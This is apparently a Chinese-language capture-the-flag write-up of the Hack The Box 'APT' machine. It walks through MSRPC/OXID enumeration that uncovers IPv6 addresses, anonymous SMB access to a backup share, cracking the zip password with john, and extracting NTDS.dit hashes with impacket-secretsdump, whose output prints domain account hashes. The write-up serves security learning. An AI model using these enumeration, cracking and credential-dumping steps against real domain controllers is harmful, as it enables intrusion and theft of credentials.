从 APT 靶机开始的内网渗透学习

前置知识

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.213
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc

只开放了两个端口

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -sT -sV -sC -O -p80,135 10.10.10.213
[sudo] password for i3eg1nner:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-01 07:49 EDT
Nmap scan report for 10.10.10.213
Host is up (0.077s latency).

PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Windows 操作系统，80 端口暴露了 Microsoft IIS httpd 10.0，135 端口是 msrpc 服务

Web 渗透

80 端口简单查看后发现，网页中有这样一个注释

<!-- Mirrored from 10.13.38.16/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 23 Dec 2019 08:12:54 GMT -->

尝试搜索了一下，并没有找到合适的利用方式。对于网页中的图片尝试使用 exiftool 和 file 命令进行了查看没有什么暗示。可提交界面中，写入一些数据提交后，显示的是无法连接10.13.38.16，和我们现在针对的 ip 并不相同。

目录爆破也试了一下，没有发现有价值的目录。

MSPRC 渗透

那就只能去查看 135 端口了。我们需要先补充一部分 MSRPC 的知识。也可以去看看这篇博客 AD Recon – MSRPC (135/539) - Juggernaut-sec 对于 MSRPC 的渗透过程讲得很细致，在不要求严格逻辑性的情况下，直接使用上述博客中的思路会极大降低这台靶机的难度。

MSRPC is an interprocess communication (IPC) mechanism that allows client/server software communcation. That process can be on the same computer, on the local network (LAN), or across the Internet. Its purpose is to provide a common interface between applications.Within Windows environments, many server applications are exposed via RPC.
MSRPC (Microsoft Remote Procedure Call) Service Enumeration | 0xffsec Handbook

MSRPC 所使用的端口有 UDP 135 和 TCP 139 / 445 。除此之外还涉及两个概念

• RPC Locator Service（RPC 定位器服务）：负责提供远程过程调用的定位服务，通过 RPC Locator Service，客户端可以查询网络上的计算机和服务，以确定它们的位置和可用性
• RPC Endpoints（RPC 终端点）：每个 RPC 终端点标识一个网络上的服务或程序。当客户端应用程序需要调用远程服务器上的服务时，它们会通过 RPC Locator Service 查找目标服务器上的 RPC 终端点。一旦找到匹配的终端点，客户端就可以使用该终端点与目标服务器进行远程过程调用。每个返回的 IFID 值代表一个 RPC 服务

而我们可以利用工具与其交互从而获得 RPC Endpoints。我们先尝试使用 rpcclient 与其连接

┌──(kali㉿kali)-[~]
└─$ sudo rpcclient -I 10.10.10.213 -P 135
Failed to set machine account: NT_STATUS_CANT_ACCESS_DOMAIN_INFO

应当是访问权限的问题，那我们只能使用别的工具来操作了

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -p135 --script=msrpc-enum 10.10.10.213
[sudo] password for i3eg1nner:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-01 08:11 EDT
Nmap scan report for 10.10.10.213
Host is up (0.081s latency).

PORT    STATE SERVICE
135/tcp open  msrpc

Nmap done: 1 IP address (1 host up) scanned in 2.94 seconds

nmap 自带脚本没扫出什么。接下来涉及一个工具集

impacket 是一系列网络协议的 python 实现，实现包括 IP、TCP、ICMP 等基础的网络协议，更重要的是其实现了大量的 Windows 通信协议。其可以在底层进行交互，

我们首先要使用的是其中的 rpcdump.py，在 kali 中可以使用 impacket-rpcdump 来运行

//默认端口为135
impacket-rpcdump 10.10.10.213

我们虽然得到了一些 UUID 相关的一些信息（以及 DOM 组件/方法），但是我们并不知道用法，因此需要另一个工具 rpcmap

┌──(kali㉿kali)-[~]
└─$ impacket-rpcmap ncacn_ip_tcp:10.10.10.213[135]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Procotol: N/A
Provider: rpcss.dll
UUID: 00000136-0000-0000-C000-000000000046 v0.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0

Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.1

Procotol: N/A
Provider: rpcss.dll
UUID: 1D55B526-C137-46C5-AB79-638F2A68E869 v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.2

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0

Procotol: N/A
Provider: rpcss.dll
UUID: 64FE0B7F-9EF5-4553-A7DB-9A1975777554 v1.0

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0

Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.2

Procotol: N/A
Provider: rpcss.dll
UUID: C6F3EE72-CE7E-11D1-B71E-00C04FC3111A v1.0

Procotol: N/A
Provider: rpcss.dll
UUID: E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0

Procotol: N/A
Provider: rpcss.dll
UUID: E60C73E6-88F9-11CF-9AF1-0020AF6E72F4 v2.0

这里涉及到对 DCOM 的一些理解

COM （Component Object Model，组件对象模型）是微软的一套软件组件的二进制接口标准，由一组构造规范和组件对象库组成。COM 组件对象通过接口来描述自身，组件所提供的所有服务都通过其接口公开。在 Windows 中每个 COM 对象都有唯一的 128 位的二进制标识符标识，即 GUID。当 GUID 用于标识 COM 对象时，被称为 CLSID（类标识符），当它用于标识接口时，被称为 IID（接口标识符），一些 CLSID 还具有 ProgID 方便人们记忆
DCOM （Distributed Component Object Model，分布式组件对象模型）是 COM 的拓展，使用 RPC 技术将 COM 的功能拓展到本地计算机之外，因此在远程系统上托管 COM 服务器端的软件（通常在 DLL 或 EXE 中）可以通过 RPC 向客户端公开其方法。部分 DCOM 组件公开的接口中可能包含不安全的方法
总结自《内网渗透体系建设》

我们不仅要获取 UUID 还要尝试获取操作数 opnums，操作数可以理解为 DCOM 若干方法的代号

//只添加目标而没有使用额外参数运行 impacket-rpcmap 的话，将尝试使用一些常见的UUID和操作号来调用远程过程调用接口，并记录下每个接口的响应情况和支持的操作。

-brute-uuids: Bruteforce UUIDs even if MGMT interface is available

-brute-opnums: Bruteforce opnums for found UUIDs

尝试使用上述两个参数来运行工具

┌──(kali㉿kali)-[~]
└─$ impacket-rpcmap ncacn_ip_tcp:10.10.10.213[135] -brute-uuids -brute-opnums
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Procotol: N/A
Provider: rpcss.dll
UUID: 00000136-0000-0000-C000-000000000046 v0.0
Opnums 0-64: rpc_s_access_denied

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.1
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 1D55B526-C137-46C5-AB79-638F2A68E869 v1.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.2
Opnums 0-64: rpc_s_access_denied

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: 64FE0B7F-9EF5-4553-A7DB-9A1975777554 v1.0
Opnums 0-64: rpc_s_access_denied

Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
Opnum 0: rpc_x_bad_stub_data
Opnum 1: rpc_x_bad_stub_data
Opnum 2: rpc_x_bad_stub_data
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnum 5: success
Opnums 6-64: nca_s_op_rng_error (opnum not found)

Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Opnum 0: success
Opnum 1: rpc_x_bad_stub_data
Opnum 2: success
Opnum 3: success
Opnum 4: rpc_x_bad_stub_data
Opnums 5-64: nca_s_op_rng_error (opnum not found)

Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.2
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: C6F3EE72-CE7E-11D1-B71E-00C04FC3111A v1.0
Opnums 0-64: rpc_s_access_denied

Procotol: N/A
Provider: rpcss.dll
UUID: E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0
Opnum 0: rpc_fault_cant_perform
Opnum 1: rpc_fault_cant_perform
Opnum 2: rpc_x_bad_stub_data
Opnum 3: rpc_x_bad_stub_data
Opnum 4: rpc_x_bad_stub_data
Opnum 5: rpc_fault_cant_perform
Opnum 6: rpc_fault_cant_perform
Opnum 7: rpc_x_bad_stub_data
Opnum 8: rpc_x_bad_stub_data
Opnums 9-64: nca_s_op_rng_error (opnum not found)

Procotol: N/A
Provider: rpcss.dll
UUID: E60C73E6-88F9-11CF-9AF1-0020AF6E72F4 v2.0
Opnums 0-64: rpc_s_access_denied

[*] Tested 354 UUID(s)

有两个存在 success 的 UUID，先尝试谷歌搜索 99FCFEC4-5260-101B-BBCB-00AA0021347A ，谷歌搜索结果的第一条就是微软官方文档，在其中找到了具体的服务名称[MS-DCOM]: Standards Assignments | Microsoft Learn

操作数为 3 和 5 的结果为 success，点击文档中的链接跳到了

发现方法名为 ServerAlive，尝试搜索关键词 IObjectExporter ServerAlive，发现了 stackflow 中给了一个链接 win32api-practice/oxid-nic-resolver at master · EddieIvan01/win32api-practice (github.com)

根据链接跳转到下一个 GitHub 上的链接

结合描述，可能是一个地址解析的服务，通过 RPC 进行调用，尝试搜索该关键词 OXID rpc，在第二个链接 The OXID Resolver [Part 1] - Remote enumeration of network interfaces without any authentication - Airbus Defence and Space Cyber 发现了利用的脚本

是 python2 的语法，但是修改也比较简单，直接将 print 后面没有加的 () 加上即可

#!/usr/bin/python

import sys, getopt

from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE
from impacket.dcerpc.v5.dcomrt import IObjectExporter

def main(argv):

    try:
        opts, args = getopt.getopt(argv,"ht:",["target="])
    except getopt.GetoptError:
        print ('IOXIDResolver.py -t <target>')
        sys.exit(2)

    target_ip = "192.168.1.1"

    for opt, arg in opts:
        if opt == '-h':
            print ('IOXIDResolver.py -t <target>')
            sys.exit()
        elif opt in ("-t", "--target"):
            target_ip = arg

    authLevel = RPC_C_AUTHN_LEVEL_NONE

    stringBinding = r'ncacn_ip_tcp:%s' % target_ip
    rpctransport = transport.DCERPCTransportFactory(stringBinding)

    portmap = rpctransport.get_dce_rpc()
    portmap.set_auth_level(authLevel)
    portmap.connect()

    objExporter = IObjectExporter(portmap)
    bindings = objExporter.ServerAlive2()

    print ("[*] Retrieving network interface of " + target_ip)

    #NetworkAddr = bindings[0]['aNetworkAddr']
    for binding in bindings:
        NetworkAddr = binding['aNetworkAddr']
        print ("Address: " + NetworkAddr)

if __name__ == "__main__":
   main(sys.argv[1:])

尝试运行

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ python IOXIDResolver.py -t 10.10.10.213
[*] Retrieving network interface of 10.10.10.213
Address: apt
Address: 10.10.10.213
Address: dead:beef::15c
Address: dead:beef::b885:d62a:d679:573f
Address: dead:beef::e16a:d825:adec:9529

IPV6 扫描

成功，得到了两个 ipv6 地址，其中 dead:beef 是使用最广泛的占位符而已，没有实际意义。

Amazingly, this also worked on the Windows 10 host – even though we were denied access with rpcmap.py
推荐的第一篇 MSRPC 渗透的博客种提到了一个有意思的点，即使我们无法使用 rpcmap 来获取 endpoint 信息，但是如果 IObjectExporter(IOXIDResolver)是在目标上存在的，那么我们也可以使用上面的脚本来获得更多的 IP 信息

既然有了新的 ip 地址目标，我们就要尝试对 ipv6 地址进行 nmap 扫描探测

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-31 05:50 EDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.075s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49675/tcp open  unknown
49698/tcp open  unknown

我还对另一个 IPV6 地址进行了探测，发现两者的扫描结果一致，那我们接下来只对第一个 ipv6 地址进行渗透。

简单分析一下各端口号的服务

• 53 是 DNS 服务端口。
• 80 Web 端口。
• 88端口通常用于 Kerberos 安全认证协议的服务（KDC 在此端口服务）。
• 389端口是 LDAP 的标准端口，用于非安全（非加密）连接。636端口是LDAP的安全版本，通常用于进行加密的LDAP通信。
• 464端口用于 Kerberos 密码更改 （Kerberos Password Change）服务，也称为 Kerberos 变更密码协议（Kerberos Change Password Protocol）。
• 593 是 RPC 作为 web 服务时的端口。
• 3269端口是用于对全局目录访问安全进行安全的 SSL/TLS 连接的默认端口，是 3268 端口的安全版（全局目录是域林中的一种特殊类型的目录，包含了整个域林的所有对象的部分副本，而标准的 LDAP 目录则可能仅包含特定域或组织的信息）。
• 5985 端口， 4986 端口，47001 端口都是 Windows Remote Management，可以称为 winrm，也可以称为 wsman，若部署了 Windows Remote Management 服务但未设置，那么就默认开放 470001 端口，如果设置完成则开放 5985 端口，加上安全套接层则开放 4986 端口。
• 9389端口通常用于 Active Directory Web Services (ADWS) 服务。是一项基于 Web 服务的技术，它提供了通过标准的 Web 服务接口与 Active Directory 进行交互的功能。
• 剩余的高端口是动态端口

对端口服务进行扫描

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo nmap -6 -sT -sV -sC -O -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49698 dead:beef::b885:d62a:d679:573f
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-31 06:02 EDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.075s latency).

PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-31 02:02:38Z)
135/tcp   open  msrpc        Microsoft Windows RPC
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-31T02:05:17+00:00; -7h59m52s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
445/tcp   open  @            Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
|_ssl-date: 2023-10-31T02:05:16+00:00; -7h59m52s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-31T02:05:17+00:00; -7h59m52s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
3269/tcp  open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-10-31T02:05:16+00:00; -7h59m52s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=6%D=10/31%OT=53%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=6540D155%P=
OS:x86_64-pc-linux-gnu)S1(P=6000{4}28063fXX{32}0035912e625508a24c684c45a01
OS:22000bd8e000002040528010303080402080a0011ce2cff{4}%ST=0.019267%RT=0.096
OS:775)S2(P=6000{4}28063fXX{32}0035912f2cb44c9b4c684c46a0122000aed10000020
OS:40528010303080402080a0011ce8fff{4}%ST=0.11927%RT=0.193719)S3(P=6000{4}2
OS:8063fXX{32}003591305a6279a74c684c47a012200056b1000002040528010303080101
OS:080a0011cef4ff{4}%ST=0.219266%RT=0.293891)S4(P=6000{4}28063fXX{32}00359
OS:131b00a892d4c684c48a0122000ee1b000002040528010303080402080a0011cf58ff{4
OS:}%ST=0.319191%RT=0.394095)S5(P=6000{4}28063fXX{32}003591323dc5194c4c684
OS:c49a0122000cfdd000002040528010303080402080a0011cfbbff{4}%ST=0.419209%RT
OS:=0.493783)S6(P=6000{4}24063fXX{32}00359133be30065e4c684c4a9012200076080
OS:000020405280402080a0011d020ff{4}%ST=0.519251%RT=0.593973)IE1(P=6000{4}8
OS:03a3fXX{32}8100cad0abcd00{122}%ST=0.562513%RT=0.636932)TECN(P=602000{3}
OS:20063fXX{32}00359134dca3711d4c684c4b80522000cfc700000204052801030308010
OS:10402%ST=0.760972%RT=0.835817)EXTRA(FL=12345)

Network Distance: 1 hop
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: apt
|   NetBIOS computer name: APT\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: apt.htb.local
|_  System time: 2023-10-31T02:05:02+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time:
|   date: 2023-10-31T02:05:05
|_  start_date: 2023-10-31T01:45:51
|_clock-skew: mean: -7h59m51s, deviation: 0s, median: -7h59m52s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.81 seconds

我们提取一下关键信息

389端口暴露了apt.htb.local
445端口暴露了Windows Server 2016 Standard
计算机名apt，域名htb.local

这样我们就彻底确认了这是一台域控，同时我们需要把 htb.local 和 IPV6 地址建立起映射

访问发现和之前 ipv4 地址的界面是一样的，联想起当时看网页源码时，里面提到了那个网站是由镜像工具生成的

smb 渗透

我们优先对低摘的果子进行渗透，这里开启了 smb 共享，我们先尝试查看有哪些共享目录

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo smbclient -L //htb.local
[sudo] password for i3eg1nner:
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
htb.local is an IPv6 address -- no workgroup available

我们先尝试访问 backup 目录

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo smbclient //htb.local/backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Sep 24 03:30:52 2020
  ..                                  D        0  Thu Sep 24 03:30:52 2020
  backup.zip                          A 10650961  Thu Sep 24 03:30:32 2020

                5114623 blocks of size 4096. 2632388 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (2632.6 KiloBytes/sec) (average 2632.6 KiloBytes/sec)
smb: \> exit

这里可以顺便把剩余几个目录也尝试访问一下，虽然有东西的概率较小。

查看 backup.zip 文件

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ file backup.zip
backup.zip: Zip archive data, at least v2.0 to extract, compression method=store
┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ unzip -l backup.zip
Archive:  backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2020-09-23 19:40   Active Directory/
 50331648  2020-09-23 19:38   Active Directory/ntds.dit
    16384  2020-09-23 19:38   Active Directory/ntds.jfm
        0  2020-09-23 19:40   registry/
   262144  2020-09-23 19:22   registry/SECURITY
 12582912  2020-09-23 19:22   registry/SYSTEM
---------                     -------
 63193088                     6 files

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ unzip backup.zip
Archive:  backup.zip
   creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:
   skipping: Active Directory/ntds.dit  incorrect password
   skipping: Active Directory/ntds.jfm  incorrect password
   creating: registry/
   skipping: registry/SECURITY       incorrect password
   skipping: registry/SYSTEM         incorrect password

查看压缩文件中的列表，可以发现其中有 AD 目录和注册表目录

• ntds.dit 是域控制器中的 SAM
• ntds.jfm 是 ntds.dit 写入丢失的文件

zip 爆破

备份的文件时效性可能没那么强。解压需要密码，那我们就是用 john 爆破一下。

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ zip2john backup.zip
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
backup.zip:$pkzip$4*1*1*0*8*24*9beb*0f135e8d5f02f852643d295a889cbbda196562ad42425146224a8804421ca88f999017ed*1*0*8*24*65d9*2a1c4c81fb6009425c2d904699497b75d843f69f8e623e3edb81596de9e732057d17fae8*1*0*8*24*acd0*0949e46299de5eb626c75d63d010773c62b27497d104ef3e2719e225fbde9d53791e11a5*2*0*156*4000*2a393785*81733d*37*8*156*2a39*0325586c0d2792d98131a49d1607f8a2215e39d59be74062d0151084083c542ee61c530e78fa74906f6287a612b18c788879a5513f1542e49e2ac5cf2314bcad6eff77290b36e47a6e93bf08027f4c9dac4249e208a84b1618d33f6a54bb8b3f5108b9e74bc538be0f9950f7ab397554c87557124edc8ef825c34e1a4c1d138fe362348d3244d05a45ee60eb7bba717877e1e1184a728ed076150f754437d666a2cd058852f60b13be4c55473cfbe434df6dad9aef0bf3d8058de7cc1511d94b99bd1d9733b0617de64cc54fc7b525558bc0777d0b52b4ba0a08ccbb378a220aaa04df8a930005e1ff856125067443a98883eadf8225526f33d0edd551610612eae0558a87de2491008ecf6acf036e322d4793a2fda95d356e6d7197dcd4f5f0d21db1972f57e4f1543c44c0b9b0abe1192e8395cd3c2ed4abec690fdbdff04d5bb6ad12e158b6a61d184382fbf3052e7fcb6235a996*$/pkzip$::backup.zip:Active Directory/ntds.jfm, registry/SECURITY, registry/SYSTEM, Active Directory/ntds.dit:backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

先使用 zip2john 来获得哈希，接下来使用 john 爆破

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ vim ziphash

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ sudo john ziphash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch   (backup.zip)
1g 0:00:00:00 DONE (2023-10-31 07:09) 100.0g/s 819200p/s 819200c/s 819200C/s newzealand..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

secretsdump

接下来我们要使用 secretsdump 工具来提取其中的信息，在这个场景中，想到使用这个工具，是一种经验。

这里推荐一个网站 WADComs 其中收集了很多域环境中的常用工具及其命令。还有一篇文章 Impacket脚本利用指南（上） - 先知社区 (aliyun.com)

secretsdump.py 提供各种技术以不运行任何程序远程 dump 密码。对 SAM 和 LSA 以及缓存的凭据，会尝试从目标注册表中读取并将 hives 保存在%SYSTEMROOT%\Temp 目录，再将 hives 读取回来。对于 DIT 文件，会使用 DL_DRSGetNCChanges 函数来 dump 目标的 NTLM hash、明文密码和 Kerberos keys。也可以通过 smbexec 或 wmiexec 执行 vssadmin 得到 NTDS.dit，并对其进行解密。这个脚本在服务不可用的情况下会打开对应的服务，例如远程注册表。在执行结束后，会将激活的服务还原。

当然 HackTricks 永远滴神 Stealing Windows Credentials - HackTricks

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ impacket-secretsdump -ntds Active\ Directory/ntds.dit -system registry/SYSTEM LOCAL > user_hash_raw

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ cat user_hash_raw | wc -l
8005

┌──(i3eg1nner㉿racknerd-4565a8)-[~/htb/apt]
└─$ head -n 20 user_hash_raw
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211:::
jeb.sloan:3200:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30:::
ranson.mejia:3201:aad3b435b51404eeaad3b435b51404ee:3ae49ec5e6fed82ceea0dc2be77750ab:::
unice.daugherty:3202:aad3b435b51404eeaad3b435b51404ee:531c98e26cfa3caee2174af495031187:::
